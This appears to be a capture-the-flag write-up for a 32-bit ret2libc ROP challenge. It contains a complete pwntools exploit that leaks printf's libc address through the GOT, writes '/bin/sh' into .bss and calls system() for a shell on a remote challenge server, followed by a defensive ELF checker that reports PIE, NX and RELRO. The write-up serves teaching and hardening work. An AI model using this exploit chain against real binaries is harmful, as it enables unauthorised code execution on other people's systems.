Since this is not much different from the problems solved earlier, it can be solved easily.
Use printf to print printf's actual (libc) address, then run the vuln function again.
```python
payload = b'A' * (0x3A + 4)          # fill the buffer up to the saved return address
payload += p32(e.plt['printf'])      # return into printf@plt
payload += p32(popret)               # printf's return address: a pop-ret gadget that discards the argument
payload += p32(e.got['printf'])      # argument: printf's GOT entry, so printf prints its own libc address
payload += p32(e.sym['vuln'])        # then return to vuln for the second stage
p.sendlineafter(b": ", payload)
```
Receive printf's actual address and compute the libc base.
```python
printf = u32(p.recvuntil(b'\xf7')[-4:])   # the leaked address ends in 0xf7 on this 32-bit libc; keep only its 4 bytes
base = printf - libc.symbols['printf']    # libc base = leaked address - offset of printf inside libc
system = base + libc.symbols['system']
```
Put /bin/sh into .bss.
```python
binsh = e.bss() + 0x10                # writable, fixed address (the binary is not PIE)
payload = b'A' * (0x3A + 4)
payload += p32(e.plt['read'])         # read(0, binsh, 0x20)
payload += p32(pppret)                # pop-pop-pop-ret gadget cleans up the three arguments
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])         # return to vuln for the third stage
p.sendline(payload)
p.sendline(b'/bin/sh\x00')            # this is what read() stores at binsh
```
Call system("/bin/sh").
```python
payload = b'A' * (0x3A + 4)
payload += p32(system)
payload += b'A' * 4                   # return address of system (unused)
payload += p32(binsh)                 # argument: the "/bin/sh" string written to .bss
p.sendline(payload)
```
Full code
```python
from pwn import *
context.log_level = 'debug'
#e = ELF('./leak_libc')
#p = process('./leak_libc')
e = ELF('./rop32')
p = remote("sunrin.site", 9003)
libc = ELF('./libc.so.6')
pdecimal = next(libc.search(b"%d\x00"))   # address of a "%d" string in libc (not used below)
# gadget addresses inside the binary; they are fixed because the binary is not PIE
popret = 0x08048331
poppopret = 0x0804855a
pppret = 0x08048559

# stage 1: leak printf's libc address through printf's GOT entry, then return to vuln
payload = b'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])
p.sendlineafter(b": ", payload)
printf = u32(p.recvuntil(b'\xf7')[-4:])   # keep only the 4 bytes of the leaked address
base = printf - libc.symbols['printf']
system = base + libc.symbols['system']

# stage 2: read(0, binsh, 0x20) writes "/bin/sh" into .bss, then return to vuln
binsh = e.bss() + 0x10
payload = b'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])
p.sendline(payload)
p.sendline(b'/bin/sh\x00')

# stage 3: system("/bin/sh")
payload = b'A' * (0x3A + 4)
payload += p32(system)
payload += b'A' * 4
payload += p32(binsh)
p.sendline(payload)
p.interactive()
```
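Everything above depends on properties of the target binary that a defender can read straight from its ELF headers: the PLT, GOT, .bss and gadget addresses are fixed (no PIE), and the stack overflow reaches the return address with no canary in the way. The script below is an added example, not part of the original writeup or of the challenge; it parses the ELF32 program headers and the dynamic segment to report PIE, NX and RELRO, the same three checks pwntools' `checksec` prints. The names `check_mitigations` and `build_sample_elf` are hypothetical, and the ELF images it inspects are constructed in memory rather than taken from the challenge binary (a canary check needs symbol lookup and is deliberately left out).

```python
import struct

# ELF constants (Elf32 layout, little-endian, as defined in elf.h)
ELFCLASS32 = 1
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR_FMT = "<4sBBBBB7sHHIIIIIHHHHHH"   # e_ident fields split out, then the rest of Elf32_Ehdr
PHDR_FMT = "<IIIIIIII"                  # Elf32_Phdr
EHDR_SIZE, PHDR_SIZE = struct.calcsize(EHDR_FMT), struct.calcsize(PHDR_FMT)  # 52, 32


def check_mitigations(elf: bytes) -> dict:
    """Report PIE / NX / RELRO for a 32-bit little-endian ELF image (hypothetical helper)."""
    (magic, ei_class, _data, _ver, _osabi, _abiver, _pad,
     e_type, _mach, _evers, _entry, e_phoff, _shoff, _flags, _ehsize,
     e_phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = struct.unpack_from(EHDR_FMT, elf, 0)
    if magic != b"\x7fELF" or ei_class != ELFCLASS32:
        raise ValueError("expected a 32-bit ELF")

    stack_flags, has_relro, dynamic = None, False, None
    for i in range(e_phnum):
        p_type, p_offset, _vaddr, _paddr, p_filesz, _memsz, p_flags, _align = \
            struct.unpack_from(PHDR_FMT, elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags          # loader honours these flags for the stack mapping
        elif p_type == PT_GNU_RELRO:
            has_relro = True               # part of the data segment is made read-only after relocation
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)

    # No PT_GNU_STACK at all means the kernel falls back to an executable stack.
    nx = stack_flags is not None and not (stack_flags & PF_X)

    # Full RELRO additionally needs eager binding, so the GOT itself becomes read-only.
    bind_now = False
    if dynamic:
        off, size = dynamic
        for pos in range(off, off + size, 8):
            d_tag, d_val = struct.unpack_from("<II", elf, pos)
            if d_tag == DT_NULL:
                break
            if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW) \
                    or (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW):
                bind_now = True
    relro = "full" if (has_relro and bind_now) else "partial" if has_relro else "none"
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample_elf(pie: bool, exec_stack: bool, relro: bool, bind_now: bool) -> bytes:
    """Constructed minimal ELF32 image carrying only the headers the checker reads."""
    phdrs = []
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, PF_R, 1))
    phdrs.append((PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | (PF_X if exec_stack else 0), 16))
    # the dynamic segment is placed right after the program header table
    dyn_off = EHDR_SIZE + (len(phdrs) + 1) * PHDR_SIZE
    dyn = struct.pack("<II", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<II", DT_NULL, 0)
    phdrs.append((PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), PF_R | PF_W, 4))
    ehdr = struct.pack(EHDR_FMT, b"\x7fELF", ELFCLASS32, 1, 1, 0, 0, b"\0" * 7,
                       ET_DYN if pie else ET_EXEC, 3, 1, 0, EHDR_SIZE, 0, 0, EHDR_SIZE,
                       PHDR_SIZE, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs) + dyn


if __name__ == "__main__":
    # a non-PIE binary with NX and partial RELRO, the shape of binary this writeup targets
    print("writeup-like:", check_mitigations(build_sample_elf(False, False, True, False)))
    # the same binary built with -fPIE -pie -Wl,-z,relro,-z,now
    print("hardened:    ", check_mitigations(build_sample_elf(True, False, True, True)))
```

Run against a real file with `check_mitigations(open(path, "rb").read())`. A `pie: False` result is what makes `e.plt`, `e.got`, `e.bss()` and the three gadget addresses usable as constants; with PIE every one of them would need its own leak first, and full RELRO would additionally block GOT overwrites (though not the GOT read used for the leak here).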